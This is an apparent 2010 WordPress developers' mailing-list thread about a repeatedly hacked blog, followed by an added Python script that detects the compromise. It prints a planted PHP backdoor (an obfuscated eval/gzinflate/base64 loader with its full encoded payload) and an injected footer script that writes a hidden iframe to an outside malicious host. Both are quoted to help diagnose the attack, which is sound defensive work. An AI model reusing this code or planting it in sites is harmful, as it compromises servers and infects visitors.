[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Mladen Adamovic mladen.adamovic at gmail.com
Sun Oct 31 18:51:24 UTC 2010


The website was hacked multiple times. While I was trying to prevent it from
happening again:
- I upgraded to the latest version
- changed passwords
- made a fresh WordPress install, imported the RSS feed of the old instance
and disabled all plugins I don't use.

..and it was hacked again.

I have now checked the access.log files with grep and all I could find
suspicious is:

access.log:69.163.128.12 - - [31/Oct/2010:03:05:04 -0700] "POST
/wp-cron.php?doing_wp_cron HTTP/1.0" 200 184 "-" "WordPress/3.0.1; "

access.log.2010-10-29:64.0.55.44 - - [29/Oct/2010:13:39:27 -0700] "POST
/wp-admin/includes/planb.php HTTP/1.1" 200 8194 "
http://blog.numbeo.com/wp-admin/includes/planb.php" "Mozilla/5.0 (Windows;
U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 AskTbSPC2/3.8.0.12304
Firefox/3.6.12 WebMoney Advisor"

This planb.php looks fishy with its content:
<?PHP
set_time_limit(0);
$login = "";
$pass = "";
$md5_pass = "";
eval(gzinflate(base64_decode('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



I did remove it. I did add security at wordpress.org to this thread.

Comments appreciated.

On Sun, Oct 31, 2010 at 7:15 PM, Ozh <ozh at ozh.org> wrote:

> Typically not a Dreamhost issue, otherwise there would be *thousands*
> of people screaming, and me in first line
>
> Being up to date with WP is fine, but most hacks on shared hosting are
> not done using WP
> - check file permissions <http://codex.wordpress.org/Hardening_WordPress>
> - check other software & scripts running on your blog
> - change your main/SSH/FTP password
> - change your WP password
>
> I once had a WP blog hacked on Dreamhost. A few hours of investigation
> later (checking all the above + inspecting access logs) I found out
> that the insecure stuff was Scuttle (a delicious clone).
>
> On shared hosting WP is often the target, but rarely the entrance.
>
> On Sun, Oct 31, 2010 at 4:07 PM, Mladen Adamovic
> <mladen.adamovic at gmail.com> wrote:
> > Hi guys,
> >
> > My wordpress software instance was repeatedly hacked ... running latest
> > Wordpress source code and being hosted on Dreamhost.
> >
> > I don't know which exploit it did use and couldn't identify it, but it
> > was adding the following code to my default theme footer.php:
> >
> > <script>
> > enc =
> >
> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
> > withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> > dec = unescape(enc);
> > document.write(dec);
> > </script>
> >
> > I think I'll have to migrate to Blogger, since I couldn't identify the
> > exploit it did use.
> >
> > I wanted to drop you an email anyhow since identifying exploits is
> > important!
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
> >
>
>
>
> --
> http://ozh.org/
>
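Added example (not code from this thread, from WordPress or from Dreamhost): a small Python triage script that automates the two checks the thread relies on. It scans file contents for the eval(gzinflate(base64_decode(...))) loader shape of the planted planb.php and for the URL-encoded iframe that footer.php unescape()s and document.write()s, decodes such strings so an analyst can read the hidden markup without running it, and parses Apache-style access.log lines to flag POSTs to PHP files a stock install never receives (and any direct request into wp-admin/includes/, which holds library code only). The allowlist of legitimate POST endpoints is an assumed baseline to be extended per site; all file contents, hostnames (blog.example, example.invalid) and IPs (documentation ranges) are constructed samples, not the thread's own.

```python
"""Triage helpers for a compromised WordPress install (added illustration).
Every file body and log line below is a constructed sample."""
import re
from urllib.parse import unquote

# Rule 1: eval() wrapped directly around a decoder chain, e.g.
# eval(gzinflate(base64_decode('...'))) -- the shape of the planted loader.
OBFUSCATED_EVAL = re.compile(
    r"eval\s*\(\s*(?:gzinflate|gzuncompress|gzdecode|base64_decode|str_rot13)\s*\(",
    re.IGNORECASE,
)
# Rule 2: a URL-encoded <iframe ...> string that a script later unescape()s
# and document.write()s -- the shape of the injected theme snippet.
ENCODED_IFRAME = re.compile(r"%3Ciframe", re.IGNORECASE)
DECODE_AND_WRITE = re.compile(r"unescape\s*\(|document\.write\s*\(", re.IGNORECASE)
# Any quoted string holding URL-encoded markup, for reading it decoded.
ENCODED_STRING = re.compile(r"""["']([^"']*%3C[^"']*)["']""", re.IGNORECASE)


def scan_file(text):
    """Return the names of the rules a file's contents trip (empty if clean)."""
    hits = []
    if OBFUSCATED_EVAL.search(text):
        hits.append("obfuscated-eval")
    if ENCODED_IFRAME.search(text) and DECODE_AND_WRITE.search(text):
        hits.append("encoded-iframe-injection")
    return hits


def decode_encoded_markup(text):
    """Decode URL-escaped strings so the hidden markup can be read, not run."""
    return [unquote(m) for m in ENCODED_STRING.findall(text)]


# Apache "combined" log format, the format of the thread's access.log lines.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Endpoints a stock WordPress 3.0 site legitimately receives POSTs on
# (assumed baseline; extend with the site's own known forms and plugins).
ALLOWED_POST_PATHS = {
    "/wp-cron.php", "/wp-login.php", "/wp-comments-post.php", "/xmlrpc.php",
    "/wp-admin/admin-ajax.php", "/wp-admin/post.php", "/wp-admin/options.php",
    "/wp-admin/admin-post.php", "/wp-admin/async-upload.php",
}
# Library directories whose PHP files are only ever included, never requested.
LIBRARY_PREFIXES = ("/wp-admin/includes/",)


def parse_log_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["target"].split("?", 1)[0]  # drop the query string
    return rec


def suspicious_requests(lines, allowed=ALLOWED_POST_PATHS):
    """Flag POSTs to PHP files outside the allowlist and any hit on a library dir."""
    flagged = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        path = rec["path"]
        in_library = path.startswith(LIBRARY_PREFIXES)
        odd_post = rec["method"] == "POST" and path.endswith(".php") and path not in allowed
        if in_library or odd_post:
            flagged.append(rec)
    return flagged


# Constructed samples: the base64 below is a harmless placeholder, never executed.
SAMPLE_BACKDOOR = """<?php
set_time_limit(0);
$login = "";
eval(gzinflate(base64_decode('Q09OU1RSVUNURUQgUExBQ0VIT0xERVI=')));
"""
SAMPLE_FOOTER = """<?php wp_footer(); ?>
<script>
enc = "%3Ciframe%20width%3D1%20height%3D1%20src%3D%27http%3A//example.invalid/x.php%27%3E%3C/iframe%3E";
dec = unescape(enc);
document.write(dec);
</script>
</body></html>
"""
SAMPLE_CLEAN = "<?php wp_footer(); ?>\n</body></html>\n"
SAMPLE_LOG = """\
192.0.2.10 - - [31/Oct/2010:03:05:04 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 200 184 "-" "WordPress/3.0.1; "
198.51.100.7 - - [29/Oct/2010:13:39:27 -0700] "POST /wp-admin/includes/planb.php HTTP/1.1" 200 8194 "http://blog.example/wp-admin/includes/planb.php" "Mozilla/5.0"
203.0.113.5 - - [29/Oct/2010:13:40:01 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Oct/2010:13:41:12 -0700] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://blog.example/?p=1" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for name, body in (("planb.php", SAMPLE_BACKDOOR), ("footer.php", SAMPLE_FOOTER),
                       ("clean.php", SAMPLE_CLEAN)):
        print(name, scan_file(body) or "clean")
    for hidden in decode_encoded_markup(SAMPLE_FOOTER):
        print("decoded markup:", hidden)
    for rec in suspicious_requests(SAMPLE_LOG.splitlines()):
        print("suspicious:", rec["ip"], rec["method"], rec["path"], rec["status"])
```

Run against a real tree by reading each .php file into scan_file() and piping access.log lines into suspicious_requests(); a 200 on a POST to a file the site never shipped, as in the planb.php line, is the signal to preserve the file for analysis and pull the full request history for that IP.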

